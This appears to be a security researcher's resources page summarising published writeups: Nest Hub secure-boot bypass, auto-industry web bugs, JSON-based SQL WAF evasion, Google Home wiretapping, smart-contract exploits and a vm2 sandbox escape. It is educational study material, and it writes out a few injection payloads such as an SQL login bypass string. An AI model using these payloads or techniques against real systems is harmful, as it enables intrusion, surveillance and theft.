Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu- 1043

fredericb    Reference →Posted 3 Years Ago
  • Google Nest Hub is an always on smart home display. It runs a device based upon the Amlogic S905D3G SoC. The device has a hidden USB port, making it prime-time for attackers.
  • By holding a combination of buttons (Volume UP + Volume DOWN) at boot (he tried randomly until something worked) to put the device into a Download mode. They tried using a known vulnerability on the same chipset, but this device had already been patched.
  • The author tears open the device to examine things more closely. The board has both USB and power connectors on a separate module, which is connected via a Flexible Flat Cable (FFC). Since there's 5 pins for USB and 2 for power that leaves 8 other pins for other functionality.
  • By probing with a multimeter and a logic analyzer while the device is running, we figure things out. The interesting portion is a pin near 0V and one fluctuating between 0V and 3.3V volts. This matches a UART port.
  • They solder the right connector to a breakout board and decide to poke at the UART interface. While studying the boot log, the text "upgrade key not pressed" appears. Could be a new attack surface! If we try the button combo logged, the text Unable to read file recovery.img appears. From doing research, they figure out this is in the UBoot bootloader code for recovery firmware upload.
  • The author decides to map out the attack surface for the parsing of this file, even though it's signed. They take a look at the FAT32 file system parser, since this had no publicly documented research. UBoot implements a sandbox architecture, which allows is to run as a Linux user space program. Let's fuzz it!
  • To start, they build a fuzzing harness into the block device reader and initialize the state to an expected point, such as USB enumeration and some partitions parsed. Once there, they setup AFL and lifuzzer to fuzz all of the different inputs that can be used. They find a crash on the block size, caused by a buffer overflow in the dev_desc->blksz being larger than 512.
  • Sounds great, right? In practice, USB flash drives never have a block size above this. So, the author decides to build one! TinyUSB provides an example of turning a Raspberry Pi Pico into a Mass Storage device. Using this code, we can induce a crash on the real device!
  • This overflow allows for an overwrite of EIP. Since there are no stack canaries or Nx at this level, we can jump to a location on the stack to execute code. Without easy debug access, the author creates a pattern that tells them what the actual offset is - 0x238.
  • The author writes a payload that dumps the RAM of memory over UART. This requires dump the gd structure, since it contains a pointer to the bootloader in RAM. Once there, we can dump all of the memory. With access to the bootloader, we can call bootloader defined functions to perform arbitrary actions, bypassing secure boot entirely.
  • The vulnerability and exploitation is pretty rad for jailbreaking the device. The author notes that the vulnerability they discovered fuzzing had already been fixed upstream twice. Amazing writeup and implementation of a mass storage device to pwn this.

Web Hackers vs. The Auto Industry- 1042

Sam Curry    Reference →Posted 3 Years Ago
  • Sam Curry decided to hit the auto industry. This ranges from BMW to Ferrari.
  • First, they were looking at a platform with a custom SSO. They started with OSINT tools like gau and ffuf, to find a WADL file with the exposed API endpoints. While trying to make requests, they noticed that wildcards could be used to find query names. Another route totp returned a 7 digit number for password resets, given a user ID! This allowed for a complete compromise of all the dealer portals.
  • While reviewing the Mercedes-Benz infrastructure, they noticed the usage of LDAP for all employee related things. Even though the main site didn't have a register function, they found the URL umas.mercedes-benz.com for repair shop tool access which DID allow for registration. These LDAP credentials could then be used on Github and various other portals they discovered. This lead to code execution in many places and major info disclosure.
  • The author was mapping out Kia when they came across kdealer.com, where dealers can register account to activate connect fo customers. kiaconnect.kdealer.com could be used to enroll a VIN but required a valid session to work. While reversing the client side JavaScript, they noticed the header prelogin could give them somewhat of a valid session to perform some actions.
  • Sadly, this continued to give errors. So, the authors took a valid session token from owners.kia.com and appended it to the request on the original site. This allowed them to create a valid vehicle initialization session to start taking over a car. Once again, adding the prelogin allowed them to generate a dealer token to pair the vehicle to our own account. With this, the car could be remotely controlled.
  • Ferrari CMS appeared to have backend credentials within the JavaScript frontend. They found an API endpoint that shared all of the routes for the backend, as well as credentials for these endpoints. With access to this information, it was possible to perform many sensitive operations, such as modify users, edit user roles and much more.
  • Spireon is a company similar to OnStar. While doing recon, they noticed the ancient site admin.spireon.com. Since this was behind auth and everything led to a redirect, they tried a simply SQL injection: admin'#. Luckily, this site was before security was a thing, leading to a login bypass. This could be used to perform admin actions like track cars. Neat!
  • But, we're not done with this endpoint yet. Anything with 'admin' would return a 403 - a denylist. So, they fuzzed the endpoint and learned that %0dadmin would break the list but still return the normal page. With this admin portal, a malicious actor could backdoor all of the devices and leak a ton of information.
  • Reviver is a site that implements virtual license plates. A company had a JSON object associated with them. One of these fields was type, for the user type. While reviewing the JavaScript, they learned about several other users, such as CORPORATE. By changing the role parameter, which is NOT shown in the request, the role of our account was changed.
  • Even with this, many authorization errors were given. So, the author had to create a user account with their new permissions. Now, the permissions worked as expected. The vulnerability above is called a mass assignment bug, since the parameter edit wasn't unexpected but updated the underlying object. This admin account gave them full access to customer information and allowed for modifications as well.
  • Two things of note for me. First, lots of internal things being exposed publicly. Since the various complicated sites have to operate together with the same core functionality, this is bound to happen. Many of these issues, such as the SSO bugs, only exist because of the attack surface as a whole and not just an issue with the website.

Emulating an iPod Touch 1G and iPhoneOS 1.0 using QEMU (Part I)- 1041

Martijn de Vos    Reference →Posted 3 Years Ago
  • The iPod 1G Touch was the first version in an amazing line of devices from Apple. So, the author wanted to emulate the device for future generations to enjoy. This was done via a branch of QEMU; in particular, they emulated all of the hardware required for booting and basic functionality.
  • The first iPod touch was an ArmV6 little endian instruction set. The author attempted to run the BootRom code on the device, but it jumped to code at an address they did not know; the same thing happened to the low level bootloader (LLB). So, they moved onto emulating from iBoot instead.
  • To understand how iBoot works, they read through the source code of an open source implementation of it then referred back to the raw binary code. From doing this, they were able to figure out how every boots up, hardware components needed and everything else. Eventually, they were able to redirect print statements to the QEMU console.
  • First, iBoot initializes hardware components, read images from NOR memory, a few other things and finally read kernel images from NAND flash. The NOR image read files, like the Apple logo, and several device properties. The NAND image contains the XNU kernel. Loading the image is not very simple because of NAND drivers containing ohter algorithms, such as ECC, bad block management and other things. The author had to write drivers for reading both the NOR and NAND flash properly.
  • To get the XNU kernel going, the author had to decrypt the image. iBoot jumps to code that the author did not have at the time to decrypt with a 8900 encryption scheme. They were able to decrypt it in QEMU logic instead. There were other hardware components like the Power Management Unit (PMU) and other things.
  • The XNU kernel is open source but Apple has their own fork of it. To understand how the system boots up, they were able to look at the open source code for the most part. From MMIO to loading the device tree to 30 different drivers that needed to be loaded correctly. The hardest one was the Flash Memory Controller (FMC), which had no documentation or source code available.
  • Finally, after this launchd starts up. This is PID 1 or the first process that starts everything else on the device. While launching Springboard (the main UI on the iPod), the device crashes because of a graphics processor trying to be used. While reverse engineering the application, the author learned that the environment variable LK_ENABLE_MBX2D disables the graphics processor. Finally, the home screen appears!
  • The final step was getting touch screen working. The iPhone simulator simulates touch by converting a click into an (x,y) coordinate pair. The kernel communicates with the Multitouch device SPI. By reverse engineering this protocol and looking at the bus traffic, the author figured out how to inject QEMU window touches into frames for the Multitouch device. This included velocity, (x,y) coordinates, home button and more.
  • After a few more small changes, such as adding some files that were missing from the stock NAND flash, they were able to get the iPod working in the emulator! There is still much work to be done, including emulating the second generation but this is amazing work. Love the article and the processes that went into getting this working with QEMU.

{JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF- 1040

Noam Moshe - claroty    Reference →Posted 3 Years Ago
  • While looking at Cambium, the authors found a simple SQL injection vulnerability. As always, the authors were not using parameterized queries, leading to string concatenation for a SQL injection. However, the exploitation of this is what was interesting.
  • There are a few limitations on the query. First, only integers can be retrieved from the rows. Using a UNION, we can query from other tables, but only integers. To get around this, the author converted each character into an integer.
  • The second limitation was the rows being returned in random order, since this was an asynchronous call. To get the ordering, the author prepended the row index to the number by multiplying it by 1000 and the row index.
  • The final limitation was the asynchronous call can timeout prior to returning the data. To make this more efficient, the author added more information to each request. In particular, they converted the character to a BIGINT, which can store 8 bytes of data. This resulted in the ability to store 7 times as much data as before.
  • They tested this working on a local instance. When testing this on the cloud, they ran into an AWS Web Application Firewall (WAF) issue. According to the authors, WAFs either have a blacklist of words for recognizing SQL syntax or they try to parse SQL syntax from the request.
  • The WAFs are trying to recognize the SQL syntax in the request. They tested hundreds of requests with many obscure features. In recent generations of SQL, there is support for JSON inside of it. While testing JSON, the author noticed that using JSON in the query made the WAF unable to parse the query. Neat!
  • Does this work on other things? It turns out that other major vendors of firewalls were vulnerable to the same JSON trick as well! Considering WAF's need to be incredibly fast in their parsing, it makes sense they would not support every feature.
  • Overall, good post for the vulnerability exploitation and WAF bypass.

Expose JTAG pads on the package- 1039

@HackingThings - Mickey    Reference →Posted 3 Years Ago
  • The three minute video consists of the author trying to access JTAG ports within the chip. So, they scrape off the SoC with a pair of tweezers then use some acid to get to the reset. After this, they solder onto the wires to get access to the JTAG interface. Pretty neat!

Turning Google smart speakers into wiretaps for $100k- 1038

downrightnifty    Reference →Posted 3 Years Ago
  • Google Home is a suite of products for around the house automation. While using the device, they noticed how seamless adding users was. Additionally, the set of automated routines, that can be ran remotely, made the linking process look like a fruitful target.
  • First, they decided to use a proxy to look at the web traffic of the device. This took some shenanigans in order to intercept on the phone, such as adding the mitmproxy as a root CA and bypass the certificate pinning using a Frida script. They then observed the linking process via the web traffic, seeing a request made to /deviceuserlinksbatch. The request was using protobuf, a binary format made by Google.
  • The linking process was made up of two requests:
    1. Get the devices' info through the local API.
    2. Send a link request to the Google server alongside this information.
  • The author reimplemented everything in Python for their own sanity. Manually recreating the protobuf binary from scratch would have been very annoying. they found a script for calling Google Cloud APIs and another that did the whole Android Google login process. With the authentication and protobuf setup, they could make craft their own requests. It should be noted for testing protobufs, there is an assumption that both users have a .proto file that defines types and names. The requests themselves don't have types (so they must be guessed) and don't have names associated with them.
  • The author made a request with this and it magically worked! There was no authorization check on whether an account had access to a particular Google Home device. Now, an attacker could link their own account to the Google Home app with ease. What can an attacker actually do with this though? This is where the article goes off the rails!
  • First, they considered the different avenues of controls devices in the house, such as opening garage doors and other things, which was originally detailed here. While scrolling through the actions on the device, they noticed a call command. If the device could be tricked into calling a phone number, then the audio would be completely required in the routine. Spy capabilities unlocked!
  • While trying to escalate the damage, they found an article from Dan Petro from 2014. This article mentions that when a Chromecast loses connection, it will go into a setup mode. By forcing the device to deauth with specific WiFi frames in close proximity, we can make a local API request to get the Cloud ID and certificate of the device.
  • While reading docs, they author noticed the Local Home SDK for creating Smart home actions on the device. Even though this has docs to directly access the LAN, the device tries to restrict by only allowing connections to devices that pass a scan. However, when the app is in a development mode, the Chrome Devtools Protocol (CDP) is open on the device, which is a remote version of Chrome DevTools. Using this, we can access the standard JS API to make arbitrary requests on the LAN, read and write files, likely leading to RCE.
  • With this finding and set of exploit chains, the author contacted Google. The author was rewarded with a 100K bounty, after initially getting hit with this being intended functionality. Google did a few things to patch these issues:
    • You must request an invite to the 'Home' that the device is registered to in order to link your account to it through the /deviceuserlinksbatch API.
    • Call commands cannot be invoked remotely anymore.
    • Although the deauth attack still works, this cannot be used to link an account. This prevents the attack from occurring since we cannot get an auth token for the device now.
  • Overall, excellent technical findings! It was really cool to see the bug and the exploits that were possible from it. I wish the article was more focused though; it seemed like their were a lot of unnecessary details, making it hard to figure out what to focus on.

Hack Analysis: Omni Protocol, July 2022- 1037

Immunefi    Reference →Posted 3 Years Ago
  • Omni is an NFT money market on Ethereum. It allowed for borrowing and lending via NFTs. For instance, a user could borrow an ERC20 asset for the NFT put up as collateral. This makes the NFT more liquid, since it can be borrowed against.
  • The function executeWithdrawERC721 will run once a user wants to remove their NFT collateral from the market. When it does this, it uses the onERC721Received if it's a contract that implements the interface.
  • When allowing code to be executed as a callback, two things need to be done: use the checks-effects-interaction pattern and include reentrancy locks. If these are not done, then major havoc can ensue.
  • The function executeWithdrawERC721 has a snippet of code that informs the market that the address no longer has deposited collateral in the contract. Prior to this variable being changed, we can escape the contract and borrow! When the code finishes, our collateral will be taken out, allowing us to steal funds from the contract.
  • A similar vulnerability occurs by using the executeERC721LiquidationCall hook with the burn function. The attacker actually abused both of the vulnerabilities to perform the reentrancy bug twice.
  • The rest of the post contains a great proof of concept with step by step details on how to exploit the bug. Overall, interesting vulnerability and interesting exploit!

Audius Governance Takeover Post-Mortem- 1036

audius    Reference →Posted 3 Years Ago
  • Audius is a blockchain music platform. In July of 2023, the governance was hacked.
  • The Audius governance contract utilizes the OpenZeppelin proxy upgrade pattern. They override the standard implementation with AudiusAdminUpgradeabilityProxy. This contract is used to change the implementation contract being used.
  • The contract AudiusAdminUpgradabilityProxy uses storage slot 0 for the address proxyAdmin. Additionally, the implementation contract used the OpenZeppelin Initializable contract. This contract had the variable initialized and initializing in the first few slots of the implementation contract.
  • The address of the proxyadmin was 0x4deca517d6817b6510798b7328f2314d3003abac. This led to both initializing and initialized to be truthy values! What does this mean? The initializer modifier would always succeed, allowing for reinitializing of the implementation contract over and over again.
  • This bug allowed the attacker to deploy Audius contract and change the storage state that was only intended to be set once during initialization. Using this, they were able to redefine the voting protocol and give themselves a ton of money.
  • To fix this vulnerability, the team used the vulnerability to patch a simple contract. Then, they were able to add the new version of the implementation that did not overlap with the proxyAdmin address for the initialize functions.
  • The vulnerability existed in the project for 2 years without anybody noticing. Considering the team used two well-defined and audited contracts, it is crazy that this vulnerability ever existed. Good report on the finding though!

Stack Overflow in Ping - FreeBSD- 1035

Tom Jones - FreeBSD    Reference →Posted 3 Years Ago
  • ping is a program to test network reachability of remote hosts. ping makes use of raw sockets in order to make ICMP messages.
  • ping reads raw IP packages from the network responses. As part of this processing, ping must reconstruct the IP header, the ICMP header and the quoted packet (error packet). While parsing this, a bunch of data is copied around.
  • While pr_pack() copies received IP and ICMP header into stack buffers. However, the sizes of these buffers don't consider that an IP option headers are following the response. When IP options are present, this creates a 40 byte buffer overflow on the stack.
  • With modern binary protections like ASLR, stack canary, etc. in place it is unlikely that this could lead to exploited remotely. ping runs in capability mode sandbox as well, which drastically changes what it can do. Defense in depth for the win!

RCE in Spotify’s Backstage via vm2 Sandbox Escape- 1034

oxeye    Reference →Posted 3 Years Ago
  • Backstage is an open source platform for building developer portals for various applications built by Spotify. It allows monitoring, managing of software and other features within microservices and infrastructure, making it super useful. Thus, compromising this would cause major problems for a company depending on the custom functionality added to it.
  • Backstage is composed of 3 main parts. First, the core functionality is the base functionality for the application. Next, the app instance ties together the core functionality with the plugins. Finally, the plugins allow for additional functionality to make it more useful.
  • The configuration is done via YAML file templates parsed by Nunjucks, which is similar to Jinja2. Templating engines are known to have security issues and there were some problems in 2016 for bypassing the Nunjucks protections. The goal of this attack was to abuse the templating engine to get code execution on the box.
  • Using the templates, it is pretty easy to run bash commands. However, this puts you into a vm2 sandbox, requiring a sandbox escape. In the past, they had found a sandbox escape by controlling properties outside of the sandbox.
  • When attempting to call getThis() method on custom stack traces, the result was undefined within the YAML file. From reading docs, this was because of strictMode being enabled and preventing things from being reached outside of the context. They modified the code to see where the check was causing this to fail - it was in the function renderString2.
  • Is there protection to overwrite this function? By redefining the function renderString in a template file, we can hook the function to make this NOT use strict mode. This sort of looks like prototype solution in the payload. Since we turned off strict mode, we can freely use getThis() on the stack trace handler to get code execution on the running machine. Besides this, some clean up was done in order to make the application still usable.
  • Adding custom templates shouldn't be possible, right? Since Backstage is not supposed to be shown publicly, there is no authentication on it. However, a power SSRF, network pentetration or a poorly configured server leave this potentially vulnerable to attack. Even though an auth page can be enabled, it is only on the frontend and not the backend.
  • Overall, an interesting blog post on the dangers of templating engines and the sandbox escapes. Great write up!